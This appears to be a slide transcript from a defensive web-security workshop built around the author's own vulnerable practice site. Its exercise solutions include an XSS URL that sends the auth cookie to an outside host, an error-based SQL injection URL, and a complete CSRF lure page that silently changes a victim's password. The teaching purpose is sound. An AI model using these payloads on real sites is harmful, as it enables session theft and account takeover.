hack yourself first - cornerstone · hack yourself first ... troyhunt.com. [email protected]....
TRANSCRIPT
We’re gonna turn you into lean, mean
hacking machines!
Because if we don’t, these kidsare going to hack you
Ryan Cleary, 20(and his mum)
Jake Davies, 19(and his mum)
Curtis Gervais, 16, awaiting trial(probably with his mum)
Who are we protecting our assets from?
Hacker Competency
Hacker Resources
Bored kids
Pocket money
Super Hackers
$10.8Bper annum
Common Thieves
Can invest where ROI
makes sense
Your Hacker Tools for Today
• A Wi-Fi connection• A mobile device you can configure a proxy on
– I have a few spares• Google Chrome
– Or another browser with good dev tools• Fiddler – getfiddler.com
– Or another HTTP proxy like charlesproxy.com
What we’ll be coveringIntroduction – 30 mins 09:00Discovering risks via the browser – 30 mins 09:30Using an HTTP proxy – 30 mins 10:00Break – 15 mins 10:30XSS – 50 mins 10:45SQL injection – 55 mins 11:35Lunch – 1 hour 12:30Mobile APIs – 60 mins 13:30CSRF – 50 mins 14:30Break – 15 mins 15:20Framework disclosure – 30 mins 15:35Session hijacking – 35 mins 16:05Wrap up – 20 mins 16:40Close 17:00
Discovering risks via the browserExercise 1
Exercise 1 – Chrome developer tools
• Familiarise yourself with the dev tools– Elements, network, cookies, console, por… uh, incognito
• Create an account at hackyourselffirst.troyhunt.com
Hacker Challenge 1:Identify three security riskswith the registration process
Using an HTTP proxyExercise 2
Exercise 2 – Using an HTTP proxy
• Familiarise yourself with Fiddler– Watch requests and their headers, review response body
and headers, use the composer to reissue request
Hacker Challenge 2:Use Fiddler to vote multiple times on 1 car with your ID
Reflected cross site scripting (XSS)Exercise 3
Understanding XSS
mysite.com/?q=<script>alert('Yay XSS!');</script>
<p>You searched for <%= Request.QueryString["q"] %></p>
<p>You searched for <script>alert('Yay XSS!');</script></p>
mysite.com/?q=ferrari
<p>You searched for ferrari</p>
Some quick XSS tips
• Check the encoding context– You encode for HTML differently than for JavaScript
• Check the encoding consistency– Often it’s manual and some characters are not encoded
• Play with JavaScript to:– Manipulate the DOM, access cookies, load external
resources
Exercise 3 – XSS
• Establish the encoding practices on the search page– What’s encoded, what’s not, what contexts are encoding
• What can be accessed or manipulated in the DOM
Hacker Challenge 3:Create an XSS attack that sends the auth cookie to another site
Exercise 3 solution
http://hackyourselffirst.troyhunt.com/Search?searchTerm=');document.location='http://www.troyhunt.com/?c='%2bdocument
.cookie;//
SQL injection (SQLi)Exercise 4
Understanding SQLi
mysite.com/?id=foo
var query = "SELECT * FROM Widget WHERE Id = "query += Request.Query["id"]
SELECT * FROM Widget WHERE Id = foo
mysite.com/?id=1
SELECT * FROM Widget WHERE Id = 1
Invalid column name 'foo'
Some quick SQLi tips
• Think of SQL commands which disclose structure– sys.tables, sys.columns, system commands
• Consider how you’d enumerate through records– Select top x rows asc then top 1 rows from that desc
• Write out how you think the query works internally– SELECT * FROM Supercar ORDER BY [URL param]
Exercise 4 – SQLi
• Explore the database using error-based SQLi– Construct strings to disclose internal data– Cast things to invalid types to disclose via exceptions
Hacker Challenge 4:Discover the version of the DB
Exercise 4 solution
http://hackyourselffirst.troyhunt.com/Make/1?orderby=@@VERSION*1
Mobile APIsExercise 5
Understanding mobile APIs
Who are we protecting our APIs from?
Attacker
Attacker
HTTP(S)
Trusting the Fiddler root cert
http://ipv4.fiddler:8888
Some quick mobile API tips
• Look at the HTTP requests for sensitive data– Credentials, account info, PII
• Remove the proxy’s root cert and make HTTPS requests– Is cert validation actually enabled in the app?
• In your own apps:– Parameter tampering, auth bypass, direct object refs
Exercise 5 – Mobile APIs
• Proxy your device through Fiddler or Charles– Inspect the traffic of your apps– Perform normal activities and monitor requests
Hacker Challenge 5:Find three “things of interest” – doesn’t have to be security related
Cross site request forgery (CSRF)Exercise 6
Understanding CSRF
POST /Login/Account
Set-Cookie: AuthCookie=XXX…
GET /Path/To/Authenticated/Resource
Authenticated request!
Cookie: AuthCookie=XXX…CSRF here!
Some quick CSRF tips
• Establish the request pattern to the target resource– What fields are being sent
• Reconstruct the request from your own resource– Normally a malicious page
• Lure the user into the malicious resource– Usually requires incentivisation
Exercise 6 – CSRF
• Mount your own CSRF attack– Reproduce a legitimate request– Use it to perform a malicious action
Hacker Challenge 6:Change the present user’s password when they load your page
Exercise 6 solution
Exercise 6 solution
<html><head><title>Win an iPhone!!!</title>
</head><body style="text-align: center;"><h1 style="font-size: 1.7em;">Want to win an iPhone? Of course you do! Click the button below and it's yours!!!</h1>
<form action="https://hackyourselffirst.troyhunt.com/Account/ChangePassword" method="POST"target="hiddenFrame"><input type="hidden" name="NewPassword" value="hackpword" /><input type="hidden" name="ConfirmPassword" value="hackpword" /><input type="submit" value="I wanna win!" onclick="alert('You won! Click ok and it\'s
done')" style="font-size: 2em;" /></form><p><img src="iPhone.jpg" style="width: 900px;" /></p><iframe name="hiddenFrame" style="display: none;"></iframe>
</body></html>
Framework disclosureExercise 7
Understanding framework disclosure risks
Learn of framework vulnerability
Search web for vulnerable sites
Pwn!
Some quick framework disclosure tips
• There are multiple ways the framework is leaked– This can differ by web stack
• Different requests can cause different leakage– Consider the different ways in which a site may responds
• Also think about other ways disclosure happens– Markup structure, naming patterns, etc
Exercise 7 – Framework disclosure
• Discover the internal framework of the site– Identify what’s being implicitly leaked– Cause the app to leak additional information
Hacker Challenge 7:Identify 3 different ways in which the internal framework is disclosed
Exercise 7 solution
1. Response headers (server, powered by, ASP.NET version, MVC version)2. Unhandled exception stack trace (includes minor ASP.NET version)
3. Session ID cookie name (ASP.NET_SessionId)4. Error page for 404 (includes minor ASP.NET version)
5. Elmah6. HTTP fingerprinting…
HTTP field ordering
Apache 1.3.23HTTP/1.1 200 OKDate: Sun, 15 Jun 2003 17:10:49 GMTServer: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003…ETag: "32417-c4-3e5d8a83"Accept-Ranges: bytesContent-Length: 196Connection: closeContent-Type: text/html
IIS 5.0HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.comDate: Fri, 01 Jan 1999 20:13:52 GMTContent-Type: text/htmlAccept-Ranges: bytesLast-Modified: Fri, 01 Jan 1999…ETag: W/"e0d362a4c335be1:ae1"Content-Length: 133
Other fingerprinting indicators
• Forbidden resource• Improper HTTP version• Improper protocol
Session hijackingExercise 8
Understanding session hijacking
POST /Login/Account
Set-Cookie: AuthCookie=XXX…
Attacker steals the cookie
Attacker issues “authenticated” request with the cookie
Some quick session hijacking tips
• Persistence over HTTP can be done multiple ways – Cookie, URL
• Session or auth ID can be obtained multiple ways– Insecure transport, referrer, stored in exceptions, XSS
• Factors that limit hijacking– Short duration expiry, keyed to client device / IP
Exercise 8 – Session hijacking
• Mount a session hijacking attack– Identify how auth is being persisted– Obtain the auth token using a vuln in the app
Hacker Challenge 8:Use an XSS risk to obtain the auth token and recreate the session in another browser